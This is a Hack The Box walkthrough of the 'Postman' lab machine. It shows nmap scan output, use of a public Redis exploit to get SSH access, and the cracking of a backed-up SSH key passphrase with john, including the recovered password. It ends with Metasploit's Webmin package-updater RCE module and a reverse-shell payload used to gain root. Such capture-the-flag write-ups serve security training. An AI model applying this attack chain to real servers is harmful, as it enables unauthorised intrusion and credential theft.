HTB Postman - 10.10.10.

160
Part 1 - Scanning
nmap -sV -sC -T5 -v -p- 10.10.10.160
PORT STATE SERVICE VERSION
22 / tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46: 83: 4f: f1: 38: 61: c0: 1c: 74: cb: b5: d1: 4a: 68: 4d: 77 (RSA)
| 256 2d: 8d: 27: d2: df: 15: 1a: 31: 53: 05: fb: ff: f0: 62: 26: 89 (ECDSA)
| _ 256 ca: 7c: 82: aa: 5a: d3: 72: ca: 8b: 8a: 38: 3a: 80: 41: a0: 45 (ED25519)
80 / tcp open http Apache httpd 2.4.29 ((Ubuntu))
| _http-favicon: Unknown favicon MD5: E234E3E8040EFB1ACD7028330A956EBF
| http-methods:
| _ Supported Methods: GET POST OPTIONS HEAD
| _http-server-header: Apache / 2.4.29 (Ubuntu)
| _http-title: The Cyber Geek's Personal Website
6379 / tcp open redis Redis key-value store 4.0.9
10000 / tcp open ssl / http MiniServ 1.910 (Webmin httpd)
| _http-favicon: Unknown favicon MD5: 91549383E709F4F1DD6C8DAB07890301
| http-methods:
| _ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt : 1 disallowed entry
| _ /
| _http-title: Site doesn't have a title (text / html; Charset = iso-8859-1).
| _http-trane-info: Problem with XML parsing of / evox / about
| ssl-cert: Subject: commonName = * / organizationName = Webmin Webserver on
Postman
| Issuer: commonName = * / organizationName = Webmin Webserver on Postman
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-08-25T16: 26: 22
| Not valid after: 2024-08-23T16: 26: 22
| MD5: 96f4 064c e63e 1277 4954 a4d9 a099 56ac
| _SHA-1: 4322 6ff3 ab7a 6ade 2887 9b89 6657 401c 3afd 5217
| _ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe: / o: linux: linux_kernel

Part 2 - Get User.txt

Port 6379 - Redis 4.0.9

The first thing we always do is check the service and its version in the vulnerability
registries -Exploit-DB, built into Kali searchsploit, etc.
There was a given exploit on Exploit-DB and searchsploit, but unfortunately it didn’t
work out as intended.

Therefore, I continued the search and after several attempts I found what really came
up:

https://github.com/Avinash-acid/Redis-Server-Exploit

I had to slightly change the exploit code for our Machine in this line (12):
From this:
script, ip_address, username = argv

To this:
ip_address = “10.10.10.160”
username = “redis””

Note:
The following packages are needed:

redis-cli
https://codewithhugo.com/install-just-redis-cli-on-ubuntu-debian-jessie/

In order to the exploit to work properly, we need to make a request through the redis-
tool until it issues a path with ".ssh":
redis-cli -h 10.10.10.160 config get dir

Redis – Operation

After starting the exploit with github, we get access to SSH on the lowpriv user redis.
(You do not need to enter any passwords at startup ... just press ENTER until you
win)
Them we go to /tmp directory and run the well-known LinEnum:

https://github.com/rebootuser/LinEnum

Later, if we closely monitor the process of searching for security holes, we notice that
in the /opt folder is id_rsa.bak, which usually stores the public key for SSH.

We open the key with cat and copy everything from there.

To create a hash and to extract a password from priv user from id_rsa, we need
ssh2john and john respectively.

So, we translate id_rsa into a hash:

ssh2john.py id_rsa.bak > redis_rsa

We get something in this spirit (md5 hash):

id_rsa.bak:
$sshng$0$8$73E9CEFBCCF5287C$119$25e840e75235eebb0238e56ac96c7e0bcdfadc8381617435d4
3770fe9af72f6036343b41eedb5f9f9b9bf9d9bf9d9bf9d9bf9a9aaaaaaaaa..

Use john to decrypt it:

john –format=SSH -wordlist=/usr/share/wordlists/rockyou.txt redis_rsa
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008 (id_rsa.bak)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:06 DONE (2019-12-23 22:12) 0.1503g/s 2156Kp/s 2156Kc/s
2156KC/sa6_123..*7¡Vamos!

We found password for the user!

At this point, it was necessary to find the username in /home directory.

ls -la /home
total 12
drwxr-xr-x 3 root root 4096 Sep 11 11:27 .
drwxr-xr-x 22 root root 4096 Aug 25 15:03 ..
drwxr-xr-x 6 Matt Matt 4096 Sep 11 11:28 Matt
Now sudo from the user “redis” to the user “Matt” with the password and we can read
user.txt file.

Part 3 Port 10000 - Webmin | root.txt

It’s time to get root.txt.

Since there’s a webmin service run in port 10000 let’s check if we can log in with Matt
credentials.

It works!

Run Metasploit to find if theres any vulnerability open for webmin 1.910
- Go to msfconsole
- We are looking for an exploit: search webmin
- There we select literally the very first exploit, or rather our RCE Package Updater:

Payload options (cmd/unix/reverse):

Run exploit and we got root, hurray!